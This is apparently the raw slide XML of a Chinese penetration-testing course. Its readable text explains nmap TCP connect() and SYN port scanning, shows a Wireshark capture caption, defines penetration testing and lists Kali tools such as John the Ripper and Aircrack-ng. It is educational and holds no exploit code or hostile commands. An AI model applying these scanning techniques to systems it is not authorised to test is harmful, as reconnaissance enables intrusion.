              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="文本框 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5472430" y="932815"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用Wireshark工具抓取的数据包如图2-2-40所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5472430" y="1577975"/>
            <a:ext cx="5276850" cy="2476500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="文本框 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5472430" y="4054475"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-40 Wireshark工具抓取的数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2014220" y="4652645"/>
            <a:ext cx="9431655" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>当SYN扫描不能用时，TCP connect( )扫描就是默认的TCP扫描。当用户没有权限发送原始报文或者扫描IPv6网络时，就是这种情况。nmap通过创建connect()，系统调用要求操作系统和目标主机及端口建立连接，而不像其他扫描类型直接发送原始报文。这是和Web浏览器、P2P客户端以及大多数其他网络应用程序用以建立连接一样的高层系统调用。它是Berkeley Sockets API编程接口的一部分。nmap用该API获得每个连接尝试的状态信息，而不是读取响应的原始报文。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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矩形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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79" name="矩形 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5554701" y="1118051"/>
            <a:ext cx="4742180" cy="4301490"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4742180" cy="4301490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086296"/>
              <a:ext cx="4076700" cy="3969385"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>渗透测试是为了证明网络防御按照预期计划正常运行而提供的一种机制。不妨假设，你的公司定期更新安全策略和程序，时时给系统打补丁，并采用了漏洞扫描器等工具，以确保所有补丁都已打上。如果你早已做到了这些，为什么还要请第三方进行审查或渗透测试呢？因为，渗透测试能够独立地检查你的网络策略，换句话说，就是给你的系统安了一双眼睛。而且，进行这类测试的人员，都是寻找网络系统安全漏洞的专业人士。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>渗透测试(penetration test）并没有一个标准的定义，国外一些安全组织达成共识的通用说法是：渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Kali Linux预装了300多个渗透测试软件，主要工具包括nmap(端口扫描器）、Wireshark（数据包分析器）、John the Ripper（密码破解器），以及Aircrack-ng (一套用于对无线局域网进行渗透测试的软件）。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="1097280" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>渗透测试</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP SYN协议的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
